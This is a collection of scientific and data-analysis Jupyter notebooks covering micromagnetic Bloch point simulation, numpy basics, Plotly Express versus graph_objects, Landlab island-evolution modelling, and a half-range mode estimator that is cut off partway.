!cp "$SAVE_DIR/$CHECKPOINT_ZIP" ./
colab_utils.download(CHECKPOINT_ZIP)
###Output
_____no_output_____
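###Markdown
As a quick sanity check before leaving Colab (a sketch using only the standard library), you can list what actually went into the zip — it should contain the latest checkpoint files, `operative_config-0.gin`, and `dataset_statistics.pkl`:
###Code
import zipfile

with zipfile.ZipFile(CHECKPOINT_ZIP) as zf:
    for name in zf.namelist():
        print(name)
###Output
_____no_output_____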
examples/spatially-varying-parameters2.ipynb
###Markdown
Spatially varying parameters 2

In this notebook, one data point from Figure 2 in [Beg *et al.* Stable and manipulable Bloch point. *Scientific Reports*, **9**, 7959 (2019)](https://doi.org/10.1038/s41598-019-44462-2) is simulated.

We need to relax a $150 \,\text{nm}$ disk, which consists of two layers with different sign of the Dzyaloshinskii-Moriya constant $D$. As set in the `D` dictionary below, the bottom layer (with $D > 0$) is $20 \,\text{nm}$ thick and the top layer (with $D < 0$) is $10 \,\text{nm}$ thick. We start by importing the necessary modules and creating the mesh with two regions.
###Code
import oommfc as mc
import discretisedfield as df
import micromagneticmodel as mm

d = 150e-9
hb = 20e-9
ht = 10e-9
cell = (5e-9, 5e-9, 2.5e-9)

subregions = {'r1': df.Region(p1=(-d/2, -d/2, -hb), p2=(d/2, d/2, 0)),
              'r2': df.Region(p1=(-d/2, -d/2, 0), p2=(d/2, d/2, ht))}

p1 = (-d/2, -d/2, -hb)
p2 = (d/2, d/2, ht)

mesh = df.Mesh(p1=p1, p2=p2, cell=cell, subregions=subregions)
###Output
_____no_output_____
###Markdown
The mesh domain and the discretisation cells are:
###Code
mesh.k3d()
###Output
_____no_output_____
###Markdown
and the two regions we defined are:
###Code
mesh.k3d_subregions()
###Output
_____no_output_____
###Markdown
Now, we need to define the system object, and by setting magnetisation saturation, set the geometry to be a disk.
###Code
system = mm.System(name='bloch_point')

D = {'r1': 1.58e-3, 'r2': -1.58e-3, 'r1:r2': 1.58e-9}
Ms = 3.84e5
A = 8.78e-12

def Ms_fun(point):
    x, y, z = point
    if x**2 + y**2 <= (d/2)**2:
        return Ms
    else:
        return 0

system.energy = mm.Exchange(A=A) + mm.DMI(D=D, crystalclass='T') + mm.Demag()
system.m = df.Field(mesh, dim=3, value=(0, 0, 1), norm=Ms_fun)
###Output
_____no_output_____
###Markdown
Our sample is now:
###Code
system.m.norm.k3d.nonzero()
###Output
_____no_output_____
###Markdown
Now, we can minimise the system's energy by using `MinDriver`.
###Code
md = mc.MinDriver()
md.drive(system)
###Output
Running OOMMF (ExeOOMMFRunner)[2022/02/25 18:18]... (2.3 s)
###Markdown
The out-of-plane magnetisation component ($m_{z}$) is now:
###Code
system.m.z.k3d.scalar(filter_field=system.m.norm)
###Output
_____no_output_____
###Markdown
We can see that two vortices with different orientation emerged. We can inspect this more closely by plotting the magnetisation in two different layers:
###Code
import k3d

plot = k3d.plot()
system.m.plane(z=-10e-9, n=(20, 20)).k3d.vector(plot=plot, color_field=system.m.z, head_size=30)
system.m.plane(z=5e-9, n=(20, 20)).k3d.vector(plot=plot, color_field=system.m.z, head_size=30)
plot.display()
###Output
_____no_output_____
###Markdown
We can now plot another cross section and see that the Bloch point emerged.
###Code
@df.interact(y=system.m.mesh.slider('y', continuous_update=False))
def my_plot(y):
    system.m.plane(y=y).mpl(figsize=(10, 5), vector_kw={'scale': 1e7})
###Output
_____no_output_____
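###Markdown
To locate the Bloch point more precisely, we can sample the relaxed magnetisation along the disk axis and look for the sign change of $m_{z}$. This is a sketch that assumes `discretisedfield`'s point-evaluation interface, where a field object is called with an `(x, y, z)` point:
###Code
import numpy as np

# Sample m_z at the disk centre, staying half a cell inside the region
for zc in np.linspace(-hb + 1.25e-9, ht - 1.25e-9, 12):
    mz = system.m((0, 0, zc))[2]
    print(f'z = {zc*1e9:6.2f} nm, mz/Ms = {mz/Ms:.3f}')
###Output
_____no_output_____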
Abanoub.ipynb
###Markdown
###Code
import numpy as np
print("Hello Mr.Abanoub")
!pip install numpy
# np.array(...) builds an array from a Python list
# (the original `np.my_array=` / `np.array=` assignments were bugs that rebound names on the numpy module)
x = np.array([5, 9, 10, 18, 122, 14, 77])
print(x)
print(x[1:3])
print(x[2:7])
y = np.array([[8, 8, 2, 11, 44, 99, 5], [8, 7, 1, 0, 22, 66, 8]])
print(y)
print(y[0:5])
print(y[0:3])
import numpy as np
Random = np.random.random((3, 3))
print(Random)
print(Random[0:3])
import numpy as np
Zero = np.zeros([3, 3])
print(Zero)
print("Yes")
import numpy as np
Pop = np.ones([4, 4])
print(Pop)
import numpy as np
Abanoub = np.full((5, 5), 8)
print(Abanoub)
import numpy as np
ident = np.eye(2, 2)
print(ident)
import numpy as np
x = np.array([[5, 10, 10, 20, 25, 30], [25, 45, 60, 55, 80, 99]])
y = np.array([[2, 3, 8, 9, 5, 7], [8, 4, 2, 1, 3, 6]])
print(x)
print(y)
print(np.add(x, y))
print(np.subtract(x, y))
print(np.divide(y, x))
print(np.multiply(x, y))
print(np.sqrt(x))
print(x)
x_new = np.sqrt(x)
y_new = np.divide(x, y)
print(x_new)
print(y_new)
z = np.multiply(x_new, y_new)
print(z)
import numpy as np
# Define a NumPy array
My_Array = np.array([10, 5, 9, 7])
print(My_Array)
print(type(My_Array))
print(My_Array.size)  # number of elements (lists have .count, ndarrays do not)
print(My_Array[0])
My_Array[2] = 80
print(My_Array[2])
print(My_Array[3])
import numpy as np
arr = np.array([[5, 6], [2, 4]])
# Rows of different lengths cannot form a rectangular ndarray, so keep a plain list here
v = [[5, 2], [3, 5, 9]]
print(v)
###Output
[[5, 2], [3, 5, 9]]
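###Markdown
A couple of extra basics that follow naturally from the arrays above (a short sketch): 2-D arrays are indexed with a row and a column, and `shape`/`dtype` describe the array.
###Code
import numpy as np

y = np.array([[8, 8, 2, 11, 44, 99, 5], [8, 7, 1, 0, 22, 66, 8]])
print(y.shape)   # (2, 7): 2 rows, 7 columns
print(y.dtype)   # integer element type
print(y[1, 3])   # row 1, column 3 -> 0
print(y[:, 0])   # first column of every row -> [8 8]
###Output
_____no_output_____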
DV - Data Visualizations with Plotly/02.Using Scenarios with Plotly/02.02.Plotly Express vs Graph_Objects.ipynb
###Markdown `Plotly Express` vs `Graph_Objects` (go)* `Plotly Express` is new high level framework released in 2019.* However for some cases, we might still want to use old framework `Graph_Objects (go)`So we need to understand what is the differences between them. ###Code import plotly.express as px import plotly.graph_objects as go iris = px.data.iris() iris.head() ###Output _____no_output_____ ###Markdown Graphing with `plotly.express` ###Code iris.columns fig = px.scatter(iris, 'sepal_width', 'sepal_length', title='Sepal Width vs Sepal Lenght') fig.show() print(fig) ###Output Figure({ 'data': [{'hovertemplate': 'sepal_width=%{x}<br>sepal_length=%{y}<extra></extra>', 'legendgroup': '', 'marker': {'color': '#636efa', 'symbol': 'circle'}, 'mode': 'markers', 'name': '', 'orientation': 'v', 'showlegend': False, 'type': 'scatter', 'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. , 4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5, 3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3, 3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8, 3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5, 3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7, 3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9, 2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7, 3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2, 2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1, 3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]), 'xaxis': 'x', 'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3, 5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2, 5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5, 4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7, 6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6, 5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. , 5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2, 5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4, 6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2, 6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9, 6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9]), 'yaxis': 'y'}], 'layout': {'legend': {'tracegroupgap': 0}, 'template': '...', 'title': {'text': 'Sepal Width vs Sepal Lenght'}, 'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_width'}}, 'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_length'}}} }) ###Markdown ------- Graphing with `graph_objects` ###Code fig = go.Figure(data=go.Scatter(x=iris['sepal_width'], y=iris['sepal_length'], mode='markers')) fig.update_layout( title='Sepal Width vs Sepal Length', xaxis_title='sepal_width', yaxis_title='sepal_length' ) fig.show() print(fig) ###Output Figure({ 'data': [{'mode': 'markers', 'type': 'scatter', 'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. , 4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5, 3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3, 3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8, 3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5, 3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7, 3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. 
, 2.9, 2.9, 2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7, 3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2, 2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1, 3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]), 'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3, 5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2, 5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5, 4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7, 6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6, 5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. , 5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2, 5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4, 6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2, 6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9, 6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9])}], 'layout': {'template': '...', 'title': {'text': 'Sepal Width vs Sepal Length'}, 'xaxis': {'title': {'text': 'sepal_width'}}, 'yaxis': {'title': {'text': 'sepal_length'}}} })
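###Markdown
The practical takeaway: `plotly.express` is a high-level wrapper that *returns* a `graph_objects.Figure`, so the two APIs are not mutually exclusive — you can start a figure with `px` and refine it with `go` methods (a minimal sketch reusing the `iris` frame from above):
###Code
fig = px.scatter(iris, 'sepal_width', 'sepal_length', title='px figure refined with go')
print(type(fig))  # plotly.graph_objs._figure.Figure

# Add an extra trace with the low-level API
fig.add_trace(go.Scatter(x=[2.5, 4.5], y=[4.5, 8.0], mode='lines', name='reference line'))
fig.show()
###Output
_____no_output_____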
evolve_island_world_gmd2106.ipynb
###Markdown Evolve Island World*(Greg Tucker, University of Colorado Boulder, spring 2021)*(Version GMD2106)Demonstration of a Landlab-built simulation of the morphological evolution of a hypothetical island micro-continent.This version was configured to generate an illustration to accompany a manuscript by Tucker et al., submitted to Geoscientific Model Development in summer 2021. Set up and initialize ###Code from landlab.io.native_landlab import load_grid, save_grid from landlab import imshow_grid, RasterModelGrid import time import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt import copy import cmocean import datetime ###Output _____no_output_____ ###Markdown Set parameters ###Code # Parameters: subaerial erosion/transport/deposition K_br = 1.0e-5 # fluvial erosion coefficient, 1/y v_s = 1.0 # fluvial deposition parameter, - # Parameters: submarine sediment transport sea_level_delta = 0.4 # scale factor for random SL variation, m wave_base = 50.0 # depth to wave base, m marine_diff = 100.0 # marine sediment diffusivity, m2/y # Parameters: tectonics and flexure extension_rate = 0.01 # horizontal extension rate, m/y fault_dip = 60.0 # surface fault dip, degrees fault_location = 4.0e4 # location parameter for fault, m detachment_depth = 1.0e4 # depth to decollement, m effective_elastic_thickness = 1.0e4 # elastic thickness, m crust_datum = -1.5e4 # depth to datum in crust, m unit_wt = 2650.0 * 9.8 # unit weight of load, kg / m s2 # Parameters: numerics and run control dt = 100.0 # time-step duration, y num_iter = 2500 # number of iterations plot_interval = 2000.0 # time interval for plotting, y save_interval = 25000.0 # time interval for saving grid, y ndigits = 3 # number of digits for output files seed = 1 # random seed # Parameters: plotting and display max_elev_for_color_scale = 1650.0 # elevation for color scale in plotting, m scale_fac_for_surface_water = 0.3 # surface water gets color equiv to -this times above scale, - area_threshold = 5.0e7 # minimum drainage area for displayed streams, m2 # Derived or initial parameters current_sea_level = 0.0 next_plot = plot_interval # next time to plot next_save = save_interval # next time to save grid frame_num = 0 # current output image frame number save_num = 0 # current save file frame number save_name = 'rift-island-save' # Other initialization np.random.seed(seed) sea_level = [] # list of sea-level values over time ###Output _____no_output_____ ###Markdown Load grid and topographyWe start with a previously generated hex grid. This grid includes a topography field that represents a quasi-circular oceanic plateau. We also want to record the perimeter node IDs so we can work with them later. ###Code grid = load_grid('initial_island.grid') z = grid.at_node['topographic__elevation'] perimeter_nodes = grid.status_at_node != grid.BC_NODE_IS_CORE ###Output _____no_output_____ ###Markdown Display initial topography ###Code cmap = copy.copy(mpl.cm.get_cmap("seismic")) scale = np.amax(np.abs(z)) imshow_grid(grid, z, vmin=-scale, vmax=scale, cmap=cmap) ###Output _____no_output_____ ###Markdown Create a raster grid for flexureThe 2D elastic lithosphere flexure component `Flexure` requires a raster grid (not hex). We will therefore define a separate raster grid for this operation. The grid has the same number of rows and columns as the hex grid, and the same spacing on the two axes. Theonly difference is that the hex grid has alternate rows offset by half a grid width. 
(Because we assume that the flexural wavelength is much longer than this, we don't bother interpolating between the grids.) ###Code flex_rast_grid = RasterModelGrid((grid.number_of_node_rows, grid.number_of_node_columns), xy_spacing=(grid.spacing, 0.866 * grid.spacing)) ###Output _____no_output_____ ###Markdown Create grid fieldsIn addition to the `topographic__elevation` field, and the output fields created by the various Components, we need the following fields:- *Water surface elevation:* the "filled topography" field used by the flow routing and depression-filling algorithms (using a separate field allows us to fill depressions with water rather than raising the topographic elevations).- *Subaerial flag:* boolean field indicating whether a given node is above current relative sea level.- *Cumulative deposit thickness:* used to track the thickness of sediment and (where negative) cumulative exhumation.- *Upper crust thickness:* used in flexural isostasy calculations to keep track of the time- and space-varying load.- *Load:* the weight per unit area of rock/sediment (note: in this version we do not track water loading, though ultimately one should). ###Code # Add field(s) wse = grid.add_zeros('water_surface__elevation', at='node', clobber=True) subaerial = grid.add_zeros('is_subaerial', at='node', dtype=bool, clobber=True) cum_depo = grid.add_zeros('cumulative_deposit_thickness', at='node') thickness = grid.add_zeros('upper_crust_thickness', at='node') load = flex_rast_grid.add_zeros( 'lithosphere__overlying_pressure_increment', at='node' ) ###Output _____no_output_____ ###Markdown Import ComponentsHere we import the Components needed for this model:- FlowAccumulator: handles subaerial routing of surface-water flow. Also creates a FlowDirectorSteepest and a LakeMapperBarnes.- ErosionDeposition: handles erosion and deposition by fluvial processes, using the Davy & Lague (2009) equations.- SimpleSubmarineDiffuser: transports sediment under water using diffusion with a coefficient that varies with local water depth.- ListricKinematicExtender: calculates tectonic extension on an idealized listric normal fault, with periodic horizontal shift of topography in the hangingwall.- Flexure: handles 2D elastic lithosphere flexure. ###Code from landlab.components import (FlowAccumulator, ErosionDeposition, SimpleSubmarineDiffuser, ListricKinematicExtender, Flexure ) ###Output _____no_output_____ ###Markdown Instantiate ComponentsNote that Flexure gets its own grid. ###Code fa = FlowAccumulator(grid, depression_finder='LakeMapperBarnes', fill_surface=wse, redirect_flow_steepest_descent=True, reaccumulate_flow=True) ed = ErosionDeposition(grid, K=K_br, v_s=v_s, solver='adaptive') sd = SimpleSubmarineDiffuser(grid, sea_level=0.0, wave_base=wave_base, shallow_water_diffusivity=marine_diff) ke = ListricKinematicExtender(grid, extension_rate=extension_rate, fault_dip=fault_dip, fault_location=fault_location, detachment_depth=detachment_depth, track_crustal_thickness=True ) fl = Flexure(flex_rast_grid, eet=effective_elastic_thickness, method='flexure' ) ###Output _____no_output_____ ###Markdown Define sea level functionThis function adds or subtracts a random amount to the current sea level. 
###Code def sea_level_random(current_sea_level, delta): return current_sea_level + delta * np.random.randn() ###Output _____no_output_____ ###Markdown Set up flexure and tectonic subsidenceTo initialize calculation of flexural isostasy and rift-related subsidence, we need to calculate:- the starting crustal thickness (above the datum, which is arbitrary)- the load created by this thickness- the initial lithospheric deflection (calculated via a call to Flexure.update())We save this initial deflection, so that for each time step we can calculate the net deflection over time (in other words, the initial deflection is assumed to be "already accounted for" in the initial topography).We also create a shorthand variable, *cum_subs*, to access the cumulative subsidence field. ###Code # Prepare flexure and tectonic subsidence thickness[:] = z - crust_datum load[:] = unit_wt * thickness fl.update() deflection = flex_rast_grid.at_node['lithosphere_surface__elevation_increment'] init_deflection = deflection.copy() cum_subs = grid.at_node['cumulative_subsidence_depth'] # for tracking purposes init_thickness = thickness.copy() ###Output _____no_output_____ ###Markdown Create a display functionThis function displays the current topography, and saves a plot to file. ###Code def display_island(grid, current_sea_level, frame_num, ndigits): z = grid.at_node['topographic__elevation'] fa.run_one_step() # re-run flow router to update the water-surface height wse = grid.at_node['water_surface__elevation'] fresh_water_elev_scale = -(scale_fac_for_surface_water * max_elev_for_color_scale) earth_sea = z - current_sea_level area = grid.at_node['drainage_area'] is_channel_or_flooded = np.logical_or(area > area_threshold, wse > z) is_fresh_water = np.logical_and(is_channel_or_flooded, earth_sea > 0.0) earth_sea[is_fresh_water] = fresh_water_elev_scale imshow_grid(grid, earth_sea, cmap=cmocean.cm.topo, vmin=-max_elev_for_color_scale, vmax=max_elev_for_color_scale) plt.axis(False) plt.savefig('island' + str(frame_num).zfill(ndigits) + '.png') ###Output _____no_output_____ ###Markdown Display the starting topographyCreate an image of the starting condition. ###Code display_island(grid, 0.0, 0, ndigits) ###Output _____no_output_____ ###Markdown Run Tectonics and flexureThe kinematic extender updates the cumulative subsidence created by the fact that the hangingwall is sliding down a listric ramp. The load is then calculated based on the current thickness minus what has been lost to subsidence (because subsidence comes from local thinning of the crust as the hangingwall slides by, in general replacing a thicker slice with a thinner one). The isostatic deflection is calculated based on the updated load. The topography is then updated by adding the thickness field to the crustal datum elevation, and subtracting the cumulative subsidence plus the isostatic subsidence (which in many places will be negative, i.e., isostatic uplift in response to tectonic and erosional thinning). Sea levelCurrent sea level is updated, and appended to the list to keep track of sea-level history. Subaerial and submarine nodes are identified based on the new sea level. Copying present topographyWe make a copy of the topography at this point in order to later calculate the *change* in topography due to erosion and sedimentation. 
Subaerial erosion and depositionIn order to restrict subaerial flow routing and fluvial erosion/deposition to land only, we change the boundary status such that all submarine nodes are flagged as boundary (fixed-value) nodes. We then run the flow-routing algorithms, followed by running the ErosionDeposition (fluvial) Component for one time step. Submarine erosion and depositionIn order to keep track of sediment delivered to the shoreline by rivers, we take the fluvial sediment-influx field, which is in m3/y, and convert it to a deposition rate by dividing by cell area. For submarine nodes, which were previously treated as boundaries and so were not updated for deposition, we now deposit this material by adding one time step's worth of deposition.We now apply submarine water-depth-dependent diffusion. This calculation will be applied to the entire grid, with an arbitrarily small diffusion coefficient applied to subaerial nodes. To enable this, we switch the boundary status of submarine nodes back to CORE, while keeping the perimeter nodes as open (fixed-value) boundaries. Cumulative erosion and depositionWe update the cumulative erosion/deposition by differencing the topography before and after this latest time step (because we copied the topography *after* doing tectonics and flexure, we include here only the effects of erosion and deposition). Updating crustal thicknessWe need to keep track of crustal thickness for the flexure calculations. Here we modify crustal thickness by adding/subtracting and deposition/erosion during this time step. Plotting and savingWe periodically pause to plot an image of the model to a file, and/or to save the run to a Landlab .grid file. ###Code for i in range(1, num_iter + 1): print(i) # Tectonic extension & flexure ke.run_one_step(dt) # update extensional subsidence load[grid.core_nodes] = (unit_wt * (thickness[grid.core_nodes] - cum_subs[grid.core_nodes])) fl.update() # update flexure z[:] = (crust_datum + thickness - (cum_subs + (deflection - init_deflection))) # Adjust sea level current_sea_level = sea_level_random(current_sea_level, sea_level_delta) print('Sea level = ' + str(current_sea_level) + ' m') sea_level.append(current_sea_level) subaerial[:] = z > current_sea_level submarine = np.invert(subaerial) # Remember previous topo z0 = z.copy() # Subaerial erosion # a. make the submarine nodes open boundaries grid.status_at_node[submarine] = grid.BC_NODE_IS_FIXED_VALUE grid.status_at_node[subaerial] = grid.BC_NODE_IS_CORE # b. route flow fa.run_one_step() # c. do some erosion ed.run_one_step(dt) # Submarine deposition depo_rate = ed._qs_in / grid.area_of_cell[0] z[submarine] += depo_rate[submarine] * dt # Submarine diffusion # a. make the submarine nodes core grid.status_at_node[submarine] = grid.BC_NODE_IS_CORE grid.status_at_node[perimeter_nodes] = grid.BC_NODE_IS_FIXED_VALUE # b. 
diffuse sd.sea_level = current_sea_level sd.run_one_step(dt) # Cumulative depo cum_depo[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes] # Update crustal thickness thickness[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes] # Plot if i*dt >= next_plot: frame_num += 1 plt.clf() display_island(grid, current_sea_level, frame_num, ndigits) next_plot += plot_interval # Save if i*dt >= next_save: save_num += 1 this_save_name = (save_name + str(save_num).zfill(ndigits) + '.grid') save_grid(grid, this_save_name, clobber=True) next_save += save_interval ###Output _____no_output_____ ###Markdown FinalizeHere we do some plotting of the model's state at the end of the run. Topography & bathymetryNote that bathymetry is cut off; colors indicating the deepest should be take as that deep OR DEEPER. ###Code import cmocean import datetime area_threshold = 5e7 za = grid.at_node['topographic__elevation'] - current_sea_level cscale = 1500.0 deep_water_scale = -cscale river_scale = -0.5 * cscale river = np.logical_and( grid.at_node['drainage_area'] > area_threshold, za > 0.0 ) za[river] = river_scale za[za < deep_water_scale] = deep_water_scale fa.run_one_step() lake = np.logical_and(wse > z, za > 0.0) za[lake] = river_scale imshow_grid(grid, za, cmap=cmocean.cm.topo, vmin=-cscale, vmax=cscale) plt.axis(False) figname = ('rift-island-t' + str(int(num_iter * dt)) + '-' + datetime.date.today().strftime('%y%m%d') + '.pdf' ) plt.savefig(figname) ###Output _____no_output_____ ###Markdown Cumulative deposition/erosion ###Code cdep = cum_depo.copy() cdep[perimeter_nodes] = 0.0 dmax = np.amax(np.abs(cdep)) imshow_grid(grid, cdep, cmap='Spectral', vmin=-dmax, vmax=dmax) plt.axis(False) plt.savefig('cum_depo.png') ###Output _____no_output_____ ###Markdown Sea-level history ###Code plt.plot(0.001 * dt * np.arange(len(sea_level)), sea_level) plt.xlabel('Time since start of run (ky)') plt.ylabel('Sea level (m)') plt.title('Sea level history') plt.grid(True) ###Output _____no_output_____ ###Markdown Cross-sectional profile ###Code startnode = ((grid.number_of_node_rows // 2) * grid.number_of_node_columns) endnode = startnode + grid.number_of_node_columns midrow = np.arange(startnode, endnode, dtype=int) x = 0.001 * grid.spacing * np.arange(0.0, len(midrow)) plt.figure() plt.plot(x, z[midrow] - np.maximum(cdep[midrow], 0.0), 'k:', label='Basement') plt.plot(x, z[midrow], 'g', label='Surface') plt.plot([0, max(x)], [current_sea_level, current_sea_level], label='Sea level' ) plt.xlabel('Distance (km)') plt.ylabel('Elevation (m)') plt.legend() plt.grid(True) ###Output _____no_output_____ ###Markdown Flexure ###Code net_flex = init_deflection - deflection imshow_grid(flex_rast_grid, net_flex) ###Output _____no_output_____
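###Markdown
A quick numerical summary of the run (a sketch assuming uniform cell area, as used in the main loop):
###Code
cell_area = grid.area_of_cell[0]
dep = cum_depo[grid.core_nodes]
print('Total deposited volume:', cell_area * dep[dep > 0.0].sum(), 'm3')
print('Total eroded volume:', -cell_area * dep[dep < 0.0].sum(), 'm3')
print('Max net isostatic uplift:', net_flex.max(), 'm')
print('Max net isostatic subsidence:', -net_flex.min(), 'm')
###Output
_____no_output_____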
Half Range Mode Estimation.ipynb
###Code
from scipy.stats import norm
import matplotlib.pyplot as plt
import numpy as np
import math
%matplotlib inline
###Code
beta = 0.5

# Example of [1,2,2,3,4]
def HRM(v, N):
    #print()
    #print("v", v)
    #print('len(v)', len(v))

    # Step 2
    # If we only have 1 or 2 values, just return their mean
    if N == 1 or N == 2:
        return v.mean()

    # Step 3
    # calculate the interval width; this method gets its name
    # with a Beta of 0.5 or half-width. Other Beta values can
    # be used for different effects
    # This is half the width of the full range of data
    w = beta*(v[-1]-v[0])
    #print("w", w)

    # Step 4
    # Create N-1 intervals called I
    # each interval is of w width
    I=[]
    for j in range(0, N-1): # j = 1 to N-1, paper is 1 based index
        I.append((v[j], v[j]+w) )
    I = np.array(I)
    #print('I', I)
    #print('len I', len(I))

    # Step 4.5
    # for each interval, determine how many values are in each interval
    cnt = np.array([((rng[0] <= v) & (v <= rng[1])).sum() for rng in I])
    N_prime = max(cnt)
    #print('cnt', cnt)
    #print('len(cnt)', len(cnt))
    #print("N_prime", N_prime)

    # Step 5
    if (cnt == N_prime).sum() == 1:
        J = I[np.where(cnt == N_prime)[0][0]]
        v = v[np.logical_and(v>=J[0], v<=J[1])]
        return HRM(v, len(v))

    # Step 6
    IJ = []
    for Ii in I[cnt==N_prime]:
        IJ.append(v[(Ii[0]<=v) & (v<=Ii[1])])

    # Step 7
    w_prime = np.ptp(IJ, axis=1).min()

    # Step 8
    Vmin = v[-1] # default to our array's min/max
    Vmax = v[0]
    for IJi in IJ:
        if (IJi[-1]-IJi[0]) == w_prime:
            if (IJi[0]<Vmin):
                Vmin = IJi[0]
            if (IJi[-1]>Vmax):
                Vmax = IJi[-1]

    # Step 9
    min_index = np.argmax(v==Vmin)
    v_back = v[::-1]
    max_index = len(v)-np.argmax(v_back==Vmax)-1
    N_prime_prime = max_index-min_index+1

    # Step 10
    v = v[min_index:max_index+1]

    # Step 11
    if N == N_prime_prime:
        # this should not happen for continuous data, but regardless we need to have a case for it
        # Essentially this means that we did not progress this iteration
        if (v[2]-v[1]) < (v[-1]-v[-2]):
            v = v[:-1]
            N_prime_prime = N_prime_prime - 1
        elif (v[2]-v[1]) > (v[-1]-v[-2]):
            v = v[1:]
            N_prime_prime = N_prime_prime - 1
        else:
            v = v[1:-1]
            N_prime_prime = N_prime_prime - 2

    # Step 12
    N = N_prime_prime
    return HRM(v, N)

def graph(modal, numBins, title):
    count, bins, ignored = plt.hist(modal, numBins)
    modal.sort()
    hrm = HRM(modal, len(modal))
    mean=modal.mean()
    median=np.median(modal)
    handles=[]
    handles.append(plt.axvline(x=hrm, color='fuchsia', label='Half-Range: {0:.2f}'.format(hrm)))
